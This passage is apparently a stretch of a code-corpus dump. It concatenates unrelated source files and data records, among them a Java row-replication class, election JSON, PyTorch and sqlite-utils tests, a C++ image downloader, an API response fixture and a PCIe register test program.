String[] parts = DataOperation.strings(command, ',');
return new SetRowCount(base, base.field(parts[0]), Data.parseInt(parts[1])).make();
}
private final Dataset base;
private final Field sizeField;
private final int N;
private SetRowCount(Dataset base, Field sizeField, int N) {
this.base = base;
this.sizeField = sizeField;
if (!sizeField.isNumeric())
throw new IllegalArgumentException("Cannot set rows based on a non-numeric field");
this.N = N;
}
private Dataset make() {
if (base.rowCount() < N) return addRows();
return base;
}
private Dataset addRows() {
int n = base.rowCount(); // The current numebr of rows
// This is how many replications we'd really like, as fractional and exact
double[] fractional = new double[n];
int[] replications = new int[fractional.length];
int calculatedN = 0;
double total = sizeField.numProperty("mean") * sizeField.numProperty("n");
for (int i = 0; i < n; i++) {
Double value = Data.asNumeric(sizeField.value(i));
fractional[i] = value == null ? 0 : value * N / total;
replications[i] = (int) Math.round(fractional[i]);
calculatedN += replications[i];
}
// If rounding caused too many rows, repeatedly reduce the result row that has the least excess
while (calculatedN > N) {
int least = 0;
for (int i = 1; i < n; i++)
if (fractional[i] - replications[i] < fractional[least] - replications[least])
least = i;
replications[least]--;
calculatedN--;
}
// If rounding caused too few rows, repeatedly increase the result row that has the least deficit
while (calculatedN < N) {
int most = 0;
for (int i = 1; i < n; i++)
if (fractional[i] - replications[i] > fractional[most] - replications[most])
most = i;
replications[most]++;
calculatedN++;
}
// Build the re-indexing
int[] rowMap = new int[N];
int targetRow = 0, baseRow = 0;
while (targetRow<N) {
for (int i=0; i<replications[baseRow]; i++) rowMap[targetRow++] = baseRow;
baseRow++;
}
// Create the replicated fields
Field[] newFields = new Field[base.fields.length];
for (int i=0; i<newFields.length; i++)
newFields[i] = Fields.permute(base.fields[i], rowMap, false);
// Return the new result
return base.replaceFields(newFields);
}
}
| 1,793 |
348 | {"nom":"<NAME>","circ":"1ère circonscription","dpt":"Yonne","inscrits":436,"abs":223,"votants":213,"blancs":16,"nuls":5,"exp":192,"res":[{"nuance":"LR","nom":"<NAME>","voix":108},{"nuance":"REM","nom":"<NAME>","voix":84}]} | 87 |
365 | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import torch
from towhee.models.layers.multi_scale_attention import MultiScaleAttention
class MultiScaleAttentionTest(unittest.TestCase):
def test_multi_scale_attention(self):
seq_len = 21
c_dim = 10
msa = MultiScaleAttention(c_dim, num_heads=2)
fake_input = torch.rand(8, seq_len, c_dim)
input_shape = (2, 2, 5)
output, output_shape = msa(fake_input, input_shape)
self.assertTrue(output.shape == fake_input.shape)
# Test pooling kernel.
msa = MultiScaleAttention(
c_dim,
num_heads=2,
stride_q=(2, 2, 1),
)
output, output_shape = msa(fake_input, input_shape)
gt_shape_tensor = torch.rand(8, 6, c_dim)
gt_output_shape = [1, 1, 5]
self.assertTrue(output.shape == gt_shape_tensor.shape)
self.assertTrue(output_shape == gt_output_shape)
# Test pooling kernel with no cls.
seq_len = 20
c_dim = 10
fake_input = torch.rand(8, seq_len, c_dim)
msa = MultiScaleAttention(
c_dim, num_heads=2, stride_q=(2, 2, 1), has_cls_embed=False
)
output, output_shape = msa(fake_input, input_shape)
gt_shape_tensor = torch.rand(8, int(seq_len / 2 / 2), c_dim)
gt_output_shape = [1, 1, 5]
self.assertTrue(output.shape == gt_shape_tensor.shape)
self.assertTrue(output_shape == gt_output_shape)
| 852 |
348 | <filename>docs/data/leg-t2/040/04003204.json
{"nom":"Nerbis","circ":"3ème circonscription","dpt":"Landes","inscrits":211,"abs":66,"votants":145,"blancs":13,"nuls":6,"exp":126,"res":[{"nuance":"SOC","nom":"M. <NAME>","voix":93},{"nuance":"REM","nom":"<NAME>","voix":33}]} | 111 |
3,734 | <filename>java8/src/main/java/com/shekhargulati/ninetynine_problems/_02_arithmetic/P37.java
package com.shekhargulati.ninetynine_problems._02_arithmetic;
/**
* (**) Determine the greatest common divisor of two positive integer numbers.
*/
public class P37 {
public static int gcd(int first, int second) {
if (first == 0) {
return second;
} else if (second == 0) {
return first;
} else if (first > second) {
return gcd(first - second, second);
} else {
return gcd(first, second - first);
}
}
}
| 258 |
1,449 | <gh_stars>1000+
#include "downloader/downloader.h"
#include <QCoreApplication>
#include <QEventLoop>
#include <QObject>
#include <QSettings>
#include <qmath.h>
#include <iostream>
#include <utility>
#include "downloader/download-query-group.h"
#include "downloader/image-downloader.h"
#include "downloader/printers/printer.h"
#include "functions.h"
#include "loader/pack-loader.h"
#include "logger.h"
#include "models/api/api.h"
#include "models/page.h"
#include "models/profile.h"
#include "models/site.h"
#include "tags/tag.h"
#include "tags/tag-api.h"
void loadMoreDetails(const QList<QSharedPointer<Image>> &images)
{
int work = images.length();
QEventLoop loop;
int requestsLimit = 5; // simultan requests
int runningRequests = 0;
for (auto& image : images) {
while (runningRequests >= requestsLimit) {
QCoreApplication::processEvents(QEventLoop::AllEvents, 100);
}
runningRequests++;
image->loadDetails();
QObject::connect(image.data(), &Image::finishedLoadingTags, [&](){
work--;
runningRequests--;
if (!work) {
loop.quit();
}
});
}
loop.exec();
}
Downloader::Downloader(Profile *profile, Printer *printer, QStringList tags, QStringList postFiltering, QList<Site*> sources, int page, int max, int perPage, QString location, QString filename, QString user, QString password, bool blacklist, Blacklist blacklistedTags, bool noDuplicates, int tagsMin, bool loadMoreDetails, bool login)
: m_profile(profile), m_printer(printer), m_lastPage(nullptr), m_tags(std::move(tags)), m_postFiltering(std::move(postFiltering)), m_sites(std::move(sources)), m_page(page), m_max(max), m_perPage(perPage), m_waiting(0), m_ignored(0), m_duplicates(0), m_tagsMin(tagsMin), m_loadMoreDetails(loadMoreDetails), m_location(std::move(location)), m_filename(std::move(filename)), m_user(std::move(user)), m_password(std::move(password)), m_blacklist(blacklist), m_noDuplicates(noDuplicates), m_blacklistedTags(std::move(blacklistedTags)), m_quit(false), m_login(login)
{}
void Downloader::setQuit(bool quit)
{
m_quit = quit;
}
QList<Page*> Downloader::getAllPagesTags()
{
QList<Page*> pages;
for (auto *site : m_sites) {
auto *page = new Page(m_profile, site, m_sites, m_tags, m_page, m_perPage, m_postFiltering, true, this);
QEventLoop loop;
QObject::connect(page, &Page::finishedLoadingTags, &loop, &QEventLoop::quit, Qt::QueuedConnection);
page->loadTags();
loop.exec();
pages.append(page);
}
return pages;
}
void Downloader::getPageCount()
{
if (m_sites.empty()) {
std::cerr << "No valid source found" << std::endl;
return;
}
const auto pages = getAllPagesTags();
int total = 0;
for (Page *p : pages) {
total += p->imagesCount();
}
qDeleteAll(pages);
if (m_quit) {
m_printer->print(total);
emit quit();
} else {
emit finishedPageCount(total);
}
}
void Downloader::getPageTags()
{
if (m_sites.empty()) {
std::cerr << "No valid source found" << std::endl;
return;
}
const auto pages = getAllPagesTags();
QList<Tag> list;
for (auto p : pages) {
const QList<Tag> &pageTags = p->tags();
for (const Tag &tag : pageTags) {
bool found = false;
for (auto &t : list) {
if (t.text() == tag.text()) {
t.setCount(t.count() + tag.count());
found = true;
}
}
if (!found) {
list.append(tag);
}
}
}
qDeleteAll(pages);
QMutableListIterator<Tag> i(list);
while (i.hasNext()) {
if (i.next().count() < m_tagsMin) {
i.remove();
}
}
if (m_quit) {
m_printer->print(list);
emit quit();
} else {
emit finishedTags(list);
}
}
void Downloader::getTags()
{
if (m_sites.empty()) {
std::cerr << "No valid source found" << std::endl;
return;
}
QList<Tag> results;
for (Site *site : qAsConst(m_sites)) {
Api *api = site->tagsApi();
if (api == nullptr) {
log(QStringLiteral("No valid API for loading tags for source: %1").arg(site->url()), Logger::Error);
return;
}
int pages = qCeil(static_cast<qreal>(m_max) / m_perPage);
if (pages <= 0 || m_perPage <= 0 || m_max <= 0) {
pages = 1;
}
for (int p = 0; p < pages; ++p) {
auto *tagApi = new TagApi(m_profile, site, api, m_page + p, m_perPage, "count", this);
QEventLoop loop;
QObject::connect(tagApi, &TagApi::finishedLoading, &loop, &QEventLoop::quit, Qt::QueuedConnection);
tagApi->load();
loop.exec();
const QList<Tag> tags = tagApi->tags();
log(QStringLiteral("Received pure tags (%1)").arg(tags.count()));
tagApi->deleteLater();
results.append(tags);
}
}
QMutableListIterator<Tag> i(results);
while (i.hasNext()) {
if (i.next().count() < m_tagsMin) {
i.remove();
}
}
if (m_quit) {
m_printer->print(results);
emit quit();
} else {
emit finishedTags(results);
}
}
QList<QSharedPointer<Image>> Downloader::getAllImages()
{
const bool usePacking = m_profile->getSettings()->value("packing_enable", true).toBool();
const int imagesPerPack = m_profile->getSettings()->value("packing_size", 1000).toInt();
const int packSize = usePacking ? imagesPerPack : -1;
QSet<QString> md5s;
QList<QSharedPointer<Image>> images;
for (auto *site : m_sites) {
DownloadQueryGroup query(m_tags, m_page, m_perPage, m_max, m_postFiltering, m_blacklist, site, m_filename, m_location);
PackLoader loader(m_profile, query, packSize, nullptr);
loader.start(m_login);
while (loader.hasNext()) {
const auto next = loader.next();
for (const auto &img : next) {
if (m_noDuplicates) {
if (md5s.contains(img->md5())) {
continue;
}
md5s.insert(img->md5());
}
images.append(img);
}
}
}
return images;
}
void Downloader::getImages()
{
if (m_sites.empty()) {
std::cerr << "No valid source found" << std::endl;
return;
}
const auto images = getAllImages();
for (const auto &image : images) {
ImageDownloader dwl(m_profile, image, m_filename, m_location, 0, true, false, this);
if (!m_blacklist) {
dwl.setBlacklist(&m_blacklistedTags);
}
QEventLoop loop;
QObject::connect(&dwl, &ImageDownloader::saved, &loop, &QEventLoop::quit, Qt::QueuedConnection);
dwl.save();
loop.exec();
if (!m_quit) {
emit finishedImage(image);
}
}
if (m_quit) {
m_printer->print(QStringLiteral("Downloaded images successfully."));
emit quit();
}
}
void Downloader::getUrls()
{
if (m_sites.empty()) {
std::cerr << "No valid source found" << std::endl;
return;
}
const auto images = getAllImages();
if (m_loadMoreDetails) {
loadMoreDetails(images);
}
if (m_quit) {
m_printer->print(images);
emit quit();
} else {
emit finishedImages(images);
}
}
| 2,643 |
333 | from collections import Counter
from foo.project_settings import *
from operator import itemgetter
import sys
import json
if __name__ == '__main__':
pslug = sys.argv[1]
if not does_project_exist(pslug):
raise NameError(project_dir(pslug) + " does not exist")
with open(words_transcript_path(pslug)) as f:
words = [w for w in json.load(f)]
unique_words = Counter(w['text'].lower() for w in words)
total_duration = words[-1]['end']
word_count = len(words)
print()
print("Total duration:", total_duration)
print("Total word count:", word_count)
print("Words/second:", round(word_count/ total_duration, 2))
print("Total unique words used:", len(unique_words))
print("Median word confidence:", sorted(words, key=itemgetter('confidence'))[word_count//2]['confidence'])
longest_words_by_char = sorted(words, key=lambda w: len(w['text']), reverse=True)
print()
print("Top 10 longest words by spelling:")
print("---------------------------------")
for w in longest_words_by_char[0:10]:
print(w['text'])
# longest_words_by_duration = sorted(words, key=lambda w: w['end'] - w['start'], reverse=True)
# print()
# print("Top 10 longest words by spoken duration:")
# print("----------------------------------------")
# for w in longest_words_by_duration[0:10]:
# print(w['text'])
print()
print("All words, listed in order of frequency:")
print("----------------------------------------")
for i, (w, x) in enumerate(sorted(unique_words.most_common(), key=lambda z: (-z[1], z[0]))):
print((str(i) + '. ').ljust(4) + w.ljust(30), str(x).rjust(6))
| 614 |
480 | <filename>options/internal/include/mlibc/debug.hpp
#ifndef MLIBC_DEBUG_HPP
#define MLIBC_DEBUG_HPP
#include <frg/logging.hpp>
namespace mlibc {
struct InfoSink {
// constexpr so that this can be initialized statically.
constexpr InfoSink() = default;
void operator() (const char *message);
};
struct PanicSink {
// constexpr so that this can be initialized statically.
constexpr PanicSink() = default;
void operator() (const char *message);
};
extern frg::stack_buffer_logger<InfoSink> infoLogger;
extern frg::stack_buffer_logger<PanicSink> panicLogger;
} // namespace mlibc
#endif // MLIBC_DEBUG_HPP
| 217 |
335 | {
"word": "Untidy",
"definitions": [
"Not arranged neatly and in order.",
"Not inclined to keep one's possessions or appearance neat and in order."
],
"parts-of-speech": "Adjective"
} | 83 |
32,544 | package com.baeldung.hamcrest;
import com.baeldung.hamcrest.objectmatchers.City;
import com.baeldung.hamcrest.objectmatchers.Location;
import org.junit.Test;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.*;
public class HamcrestObjectUnitTest {
@Test
public void givenACity_whenHasToString_thenCorrect() {
City city = new City("San Francisco", "CA");
assertThat(city, hasToString("[Name: San Francisco, State: CA]"));
}
@Test
public void givenACity_whenHasToStringEqualToIgnoringCase_thenCorrect() {
City city = new City("San Francisco", "CA");
assertThat(city, hasToString(equalToIgnoringCase("[NAME: <NAME>, STATE: CA]")));
}
@Test
public void givenACity_whenHasToStringEmptyOrNullString_thenCorrect() {
City city = new City(null, null);
assertThat(city, hasToString(emptyOrNullString()));
}
@Test
public void givenACity_whenTypeCompatibleWithLocation_thenCorrect() {
City city = new City("San Francisco", "CA");
assertThat(city.getClass(), is(typeCompatibleWith(Location.class)));
}
@Test
public void givenACity_whenTypeNotCompatibleWithString_thenCorrect() {
City city = new City("San Francisco", "CA");
assertThat(city.getClass(), is(not(typeCompatibleWith(String.class))));
}
@Test
public void givenACity_whenTypeCompatibleWithObject_thenCorrect() {
City city = new City("San Francisco", "CA");
assertThat(city.getClass(), is(typeCompatibleWith(Object.class)));
}
}
| 594 |
364 | <gh_stars>100-1000
package io.github.jklingsporn.vertx.jooq.shared;
import io.vertx.core.json.JsonArray;
import org.jooq.Converter;
/**
* Created by jensklingsporn on 04.10.16.
* Use this converter to convert any varchar/String column into a JsonArray.
*/
public class JsonArrayConverter implements Converter<String,JsonArray> {
@Override
public JsonArray from(String databaseObject) {
return databaseObject==null?null:new JsonArray(databaseObject);
}
@Override
public String to(JsonArray userObject) {
return userObject==null?null:userObject.encode();
}
@Override
public Class<String> fromType() {
return String.class;
}
@Override
public Class<JsonArray> toType() {
return JsonArray.class;
}
}
| 298 |
1,025 | <reponame>pkh/Core-Data-Editor
#import <Foundation/Foundation.h>
@interface CDEManagedObjectIDToStringValueTransformer : NSValueTransformer
#pragma mark - Register
+ (void)registerDefaultManagedObjectIDToStringValueTransformer;
@end
| 76 |
2,338 | <gh_stars>1000+
// RUN: %clang -E -mspeculative-load-hardening %s -o - | FileCheck --check-prefix=CHECK-SLH %s
// RUN: %clang -E -mno-speculative-load-hardening %s -o - | FileCheck --check-prefix=CHECK-NOSLH %s
// RUN: %clang -E %s -o - | FileCheck --check-prefix=CHECK-DEFAULT %s
#if __has_feature(speculative_load_hardening)
int SpeculativeLoadHardeningEnabled();
#else
int SpeculativeLoadHardeningDisabled();
#endif
// CHECK-SLH: SpeculativeLoadHardeningEnabled
// CHECK-NOSLH: SpeculativeLoadHardeningDisabled
// CHECK-DEFAULT: SpeculativeLoadHardeningDisabled
| 213 |
5,169 | <reponame>ftapp/cocoapods
{
"name": "SobrCameraView",
"version": "0.2.1",
"summary": "A simple UIView-Subclass which enables border detection of documents.",
"homepage": "https://github.com/softwarebrauerei/SobrCameraView-ios",
"license": "MIT",
"authors": {
"<NAME> AG": "<EMAIL>"
},
"source": {
"git": "https://github.com/softwarebrauerei/SobrCameraView-ios.git",
"tag": "0.2.1"
},
"platforms": {
"ios": "8.0"
},
"source_files": "SobrCameraView/*.swift",
"requires_arc": true
}
| 220 |
315 | package io.budgetapp.model;
import java.io.Serializable;
/**
*
*/
public class Point implements Serializable {
private static final long serialVersionUID = -4254482540288351126L;
private String label;
private long key;
private double value;
private PointType pointType;
public Point(String label, long key, double value, PointType pointType) {
this.label = label;
this.key = key;
this.value = value;
this.pointType = pointType;
}
public String getLabel() {
return label;
}
public long getKey() {
return key;
}
public double getValue() {
return value;
}
public PointType getPointType() {
return pointType;
}
}
| 285 |
326 | /*
//--------------------------------------------------------------------------------
//--
//-- This file is owned and controlled by Xilinx and must be used solely
//-- for design, simulation, implementation and creation of design files
//-- limited to Xilinx devices or technologies. Use with non-Xilinx
//-- devices or technologies is expressly prohibited and immediately
//-- terminates your license.
//--
//-- Xilinx products are not intended for use in life support
//-- appliances, devices, or systems. Use in such applications is
//-- expressly prohibited.
//--
//-- **************************************
//-- ** Copyright (C) 2006, Xilinx, Inc. **
//-- ** All Rights Reserved. **
//-- **************************************
//--
//--------------------------------------------------------------------------------
//-- Filename: test_reg.cpp
//--
//-- Description:
//--
//-- Sample driver for the Memcached demo
//-- Writes and reads to/from all relevant device registers
//--
//--
//--------------------------------------------------------------------------------
*/
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <fcntl.h>
#include <errno.h>
#include "xpcie.h"
#define NUM_T 32
char devname[] = "/dev/xpcie";
int g_devFile = -1;
struct TransferData {
unsigned int data[NUM_T];
} *gReadData, *gWriteData;
int ReadReg(int offset){
xpcie_arg_t* q=(xpcie_arg_t*) malloc(sizeof(xpcie_arg_t));
(*q).offset=offset;
(*q).rdata=0x55;//will be overwritten, is just a sanity check
(*q).wdata=0x66;//not used for read, is just a sanity check
int ret=ioctl(g_devFile,XPCIE_READ_REG,q);//XPCIE_READ_REG is a constant defined in xpcie.h
if(ret){
printf("error while reading pcie. offset:%x error:%x\n",offset,ret);
}
//printf("got back offs=%x rdata=%x wdata=%x rcode %d\n",(*q).offset,(*q).rdata,(*q).wdata,ret);
return ((*q).rdata);
}
void WriteReg(int offset, int wdata){
xpcie_arg_t* q=(xpcie_arg_t*) malloc(sizeof(xpcie_arg_t));
(*q).offset=offset;
(*q).rdata=0x55;//not used for write, is just a sanity check
(*q).wdata=wdata;
int ret=ioctl(g_devFile,XPCIE_WRITE_REG,q);
if(ret){
printf("error while writing pcie. offset:%x error:%x\n",offset,ret);
}
//printf("got back offs=%x rdata=%x wdata=%x rcode %d\n",(*q).offset,(*q).rdata,(*q).wdata,ret);
}
//bulk read from beginning of device memory. Not really needed
int WriteData(char* buff, int size)
{
int ret = write(g_devFile, buff, size);
return (ret);
}
//bulk write to beginning of device memory Not really needed
int ReadData(char *buff, int size)
{
int ret = read(g_devFile, buff, size);
return (ret);
}
int main()
{
int i, j;
char* devfilename = devname;
g_devFile = open(devfilename, O_RDWR);
if ( g_devFile < 0 ) {
printf("Error opening device file\n");
return 0;
}
/*gReadData = (TransferData *) malloc(sizeof(struct TransferData));
gWriteData = (TransferData *) malloc(sizeof(struct TransferData)); */
//read address must be 4-aligned to yield proper result
//ReadReg(0x8);
// ReadReg(0xffc);//4k if you go over 0xffc, bad things happen
//addresses of FREE regs: 0x30, 0x34, 0x38, 0x3C
//when the FREE regs are written to, the circuit gets notified of the fresh value
//when the FREE regs are read from, the most significant bit tells if the fifo is full
//the other 31 bits hold the value that was written in the last write to the reg
printf("\n\n##############################\n\n");
int x=ReadReg(0xf0);
printf("IBM Memcached Power8 Demo: Bitstream revision number: %x\n",x);
for(int rwnum=0;rwnum<4;rwnum++){
printf("\n\n##############################\n\n");
int rwAdd=4*rwnum+0x30;
printf("reading free%d from %x\n",rwnum+1,rwAdd);
int x=ReadReg(rwAdd);
printf("read result: %x\n",x);
printf("writing 0xCAFECAFE to free%d at %x\n",rwnum+1,rwAdd);
WriteReg(rwAdd,0xCAFECAFE);
printf("reading free%d from %x ",rwnum+1,rwAdd);
x=ReadReg(rwAdd);
printf("read result: %x\n",x);
bool wasFull=x&0x80000000;
printf("full flag in top bit was: %s",(wasFull?"true":"false"));
}
printf("\n\n##############################\n\n");
//the DEL reg does nothing for now
int rwAdd=0x20;
x=ReadReg(rwAdd);
printf("reading del from %x\n",rwAdd);
printf("read result: %x\n",x);
bool wasFull=x&0x80000000;
printf("ety flag in top bit was: %s",(wasFull?"true":"false"));
printf("\n\n##############################\n\n");
//check the 4 stats registers, will be occasionally nonzero when ethernet exercised
//the stats values in the hardware are generated like this:
//if data line busy, increase counter1
//always increase counter2
//if counter2 overflows, reset both, write value of counter1 to software readable register
//counter2 has 22 bits => max value 2^22-1, so busy percentage is s0/((1<<22)-1)*100;
int maxval=(1<<22)-1;
for(;;){
int s0=ReadReg(0x0);//stats0
int s1=ReadReg(0x4);//stats1
int s2=ReadReg(0x8);//stats2
int s3=ReadReg(0xc);//stats3
double p0,p1,p2,p3;
p0=(double)s0/maxval*100;
p1=(double)s1/maxval*100;
p2=(double)s2/maxval*100;
p3=(double)s3/maxval*100;
//if(s0!=0||x1!=0){
// printf("stats0= %x stats1= %x stats2= %x stats3= %x ",s0,s1,s2,s3);
//}
//printf("stats0= %x stats1= %x stats2= %x stats3= %x \r",s0,s1,s2,s3);
printf("stats0= %3.2f%% stats1= %3.2f%% stats2= %3.2f%% stats3= %3.2f%% \r",p0,p1,p2,p3);
}
}
| 2,426 |
351 | {
"request": {
"api_url": "https://api.baremetrics.com/v1/account",
"headers": {
"Authorization": "Bearer TEST"
}
},
"response": {
"error": "Unauthorized. Token not found (001)"
},
"response-headers": {
"Cache-Control":"no-cache",
"X-Version":"751",
"X-Runtime":"0.003459",
"Access-Control-Allow-Methods":"GET, OPTIONS, POST, PUT, DELETE",
"Transfer-Encoding":"chunked",
"Date":"Tue, 06 Feb 2018 14:00:34 GMT",
"Connection":"keep-alive",
"CF-RAY":"3e8ea2ed2dbe3de4-PRG",
"Access-Control-Allow-Credentials":"false",
"Content-Type":"application/json; charset=utf-8",
"Set-Cookie":"__cfduid=d17cabc42559cc2d84e59a61d199208c11517925634; expires=Wed, 06-Feb-19 14:00:34 GMT; path=/; domain=.baremetrics.com; HttpOnly; Secure, LSW_WEB=\"LSW_WEB1\"; path=/",
"Access-Control-Allow-Headers":"Authorization,DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type",
"X-Request-Id":"4c6d2ef3-2b72-4b7a-b535-991ee8c06fba",
"X-Commit":"<PASSWORD>",
"X-Powered-By":"Phusion Passenger 5.1.11",
"Expect-CT":"max-age=604800, report-uri=\"https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct\"",
"Server":"cloudflare",
"Status":"401 Unauthorized"
}
}
| 674 |
729 | import json
import pytest
from click.testing import CliRunner
from sqlite_utils import Database, cli
def test_memory_basic():
result = CliRunner().invoke(cli.cli, ["memory", "select 1 + 1"])
assert result.exit_code == 0
assert result.output.strip() == '[{"1 + 1": 2}]'
@pytest.mark.parametrize("sql_from", ("test", "t", "t1"))
@pytest.mark.parametrize("use_stdin", (True, False))
def test_memory_csv(tmpdir, sql_from, use_stdin):
content = "id,name\n1,Cleo\n2,Bants"
input = None
if use_stdin:
input = content
csv_path = "-"
if sql_from == "test":
sql_from = "stdin"
else:
csv_path = str(tmpdir / "test.csv")
open(csv_path, "w").write(content)
result = CliRunner().invoke(
cli.cli,
["memory", csv_path, "select * from {}".format(sql_from), "--nl"],
input=input,
)
assert result.exit_code == 0
assert (
result.output.strip() == '{"id": 1, "name": "Cleo"}\n{"id": 2, "name": "Bants"}'
)
@pytest.mark.parametrize("use_stdin", (True, False))
def test_memory_tsv(tmpdir, use_stdin):
data = "id\tname\n1\tCleo\n2\tBants"
if use_stdin:
input = data
path = "stdin:tsv"
sql_from = "stdin"
else:
input = None
path = str(tmpdir / "chickens.tsv")
open(path, "w").write(data)
path = path + ":tsv"
sql_from = "chickens"
result = CliRunner().invoke(
cli.cli,
["memory", path, "select * from {}".format(sql_from)],
input=input,
)
assert result.exit_code == 0, result.output
assert json.loads(result.output.strip()) == [
{"id": 1, "name": "Cleo"},
{"id": 2, "name": "Bants"},
]
@pytest.mark.parametrize("use_stdin", (True, False))
def test_memory_json(tmpdir, use_stdin):
data = '[{"name": "Bants"}, {"name": "Dori", "age": 1, "nested": {"nest": 1}}]'
if use_stdin:
input = data
path = "stdin:json"
sql_from = "stdin"
else:
input = None
path = str(tmpdir / "chickens.json")
open(path, "w").write(data)
path = path + ":json"
sql_from = "chickens"
result = CliRunner().invoke(
cli.cli,
["memory", path, "select * from {}".format(sql_from)],
input=input,
)
assert result.exit_code == 0, result.output
assert json.loads(result.output.strip()) == [
{"name": "Bants", "age": None, "nested": None},
{"name": "Dori", "age": 1, "nested": '{"nest": 1}'},
]
@pytest.mark.parametrize("use_stdin", (True, False))
def test_memory_json_nl(tmpdir, use_stdin):
data = '{"name": "Bants"}\n\n{"name": "Dori"}'
if use_stdin:
input = data
path = "stdin:nl"
sql_from = "stdin"
else:
input = None
path = str(tmpdir / "chickens.json")
open(path, "w").write(data)
path = path + ":nl"
sql_from = "chickens"
result = CliRunner().invoke(
cli.cli,
["memory", path, "select * from {}".format(sql_from)],
input=input,
)
assert result.exit_code == 0, result.output
assert json.loads(result.output.strip()) == [
{"name": "Bants"},
{"name": "Dori"},
]
@pytest.mark.parametrize("use_stdin", (True, False))
def test_memory_csv_encoding(tmpdir, use_stdin):
latin1_csv = (
b"date,name,latitude,longitude\n" b"2020-03-04,S\xe3o Paulo,-23.561,-46.645\n"
)
input = None
if use_stdin:
input = latin1_csv
csv_path = "-"
sql_from = "stdin"
else:
csv_path = str(tmpdir / "test.csv")
with open(csv_path, "wb") as fp:
fp.write(latin1_csv)
sql_from = "test"
# Without --encoding should error:
assert (
CliRunner()
.invoke(
cli.cli,
["memory", csv_path, "select * from {}".format(sql_from), "--nl"],
input=input,
)
.exit_code
== 1
)
# With --encoding should work:
result = CliRunner().invoke(
cli.cli,
["memory", "-", "select * from stdin", "--encoding", "latin-1", "--nl"],
input=latin1_csv,
)
assert result.exit_code == 0, result.output
assert json.loads(result.output.strip()) == {
"date": "2020-03-04",
"name": "São Paulo",
"latitude": -23.561,
"longitude": -46.645,
}
@pytest.mark.parametrize("extra_args", ([], ["select 1"]))
def test_memory_dump(extra_args):
result = CliRunner().invoke(
cli.cli,
["memory", "-"] + extra_args + ["--dump"],
input="id,name\n1,Cleo\n2,Bants",
)
assert result.exit_code == 0
assert result.output.strip() == (
"BEGIN TRANSACTION;\n"
'CREATE TABLE "stdin" (\n'
" [id] INTEGER,\n"
" [name] TEXT\n"
");\n"
"INSERT INTO \"stdin\" VALUES(1,'Cleo');\n"
"INSERT INTO \"stdin\" VALUES(2,'Bants');\n"
"CREATE VIEW t1 AS select * from [stdin];\n"
"CREATE VIEW t AS select * from [stdin];\n"
"COMMIT;"
)
@pytest.mark.parametrize("extra_args", ([], ["select 1"]))
def test_memory_schema(extra_args):
result = CliRunner().invoke(
cli.cli,
["memory", "-"] + extra_args + ["--schema"],
input="id,name\n1,Cleo\n2,Bants",
)
assert result.exit_code == 0
assert result.output.strip() == (
'CREATE TABLE "stdin" (\n'
" [id] INTEGER,\n"
" [name] TEXT\n"
");\n"
"CREATE VIEW t1 AS select * from [stdin];\n"
"CREATE VIEW t AS select * from [stdin];"
)
@pytest.mark.parametrize("extra_args", ([], ["select 1"]))
def test_memory_save(tmpdir, extra_args):
save_to = str(tmpdir / "save.db")
result = CliRunner().invoke(
cli.cli,
["memory", "-"] + extra_args + ["--save", save_to],
input="id,name\n1,Cleo\n2,Bants",
)
assert result.exit_code == 0
db = Database(save_to)
assert list(db["stdin"].rows) == [
{"id": 1, "name": "Cleo"},
{"id": 2, "name": "Bants"},
]
@pytest.mark.parametrize("option", ("-n", "--no-detect-types"))
def test_memory_no_detect_types(option):
result = CliRunner().invoke(
cli.cli,
["memory", "-", "select * from stdin"] + [option],
input="id,name,weight\n1,Cleo,45.5\n2,Bants,3.5",
)
assert result.exit_code == 0, result.output
assert json.loads(result.output.strip()) == [
{"id": "1", "name": "Cleo", "weight": "45.5"},
{"id": "2", "name": "Bants", "weight": "3.5"},
]
def test_memory_analyze():
result = CliRunner().invoke(
cli.cli,
["memory", "-", "--analyze"],
input="id,name\n1,Cleo\n2,Bants",
)
assert result.exit_code == 0
assert result.output == (
"stdin.id: (1/2)\n\n"
" Total rows: 2\n"
" Null rows: 0\n"
" Blank rows: 0\n\n"
" Distinct values: 2\n\n"
"stdin.name: (2/2)\n\n"
" Total rows: 2\n"
" Null rows: 0\n"
" Blank rows: 0\n\n"
" Distinct values: 2\n\n"
)
def test_memory_two_files_with_same_stem(tmpdir):
(tmpdir / "one").mkdir()
(tmpdir / "two").mkdir()
one = tmpdir / "one" / "data.csv"
two = tmpdir / "two" / "data.csv"
one.write_text("id,name\n1,Cleo\n2,Bants", encoding="utf-8")
two.write_text("id,name\n3,Blue\n4,Lila", encoding="utf-8")
result = CliRunner().invoke(cli.cli, ["memory", str(one), str(two), "", "--schema"])
assert result.exit_code == 0
assert result.output == (
'CREATE TABLE "data" (\n'
" [id] INTEGER,\n"
" [name] TEXT\n"
");\n"
"CREATE VIEW t1 AS select * from [data];\n"
"CREATE VIEW t AS select * from [data];\n"
'CREATE TABLE "data_2" (\n'
" [id] INTEGER,\n"
" [name] TEXT\n"
");\n"
"CREATE VIEW t2 AS select * from [data_2];\n"
)
| 3,947 |
335 | {
"word": "Scrimmage",
"definitions": [
"A confused struggle or fight.",
"A sequence of play beginning with the placing of the ball on the ground with its longest axis at right angles to the goal line.",
"A session in which teams practise by playing a simulated game."
],
"parts-of-speech": "Noun"
} | 115 |
1,760 | <filename>Contests/USACO Training/Ch 1/1.5 pprime.cpp
/*
ID: bqi3431
PROG: pprime
LANG: C++11
*/
#include <iostream>
#include <fstream>
#include <vector>
#include <ext/pb_ds/assoc_container.hpp>
#include <ext/pb_ds/tree_policy.hpp>
using namespace std;
using namespace __gnu_pbds;
typedef long long ll;
typedef vector<int> vi;
typedef pair<int, int> pi;
typedef tree<int,null_type,less<int>,rb_tree_tag,tree_order_statistics_node_update> ordered_set;
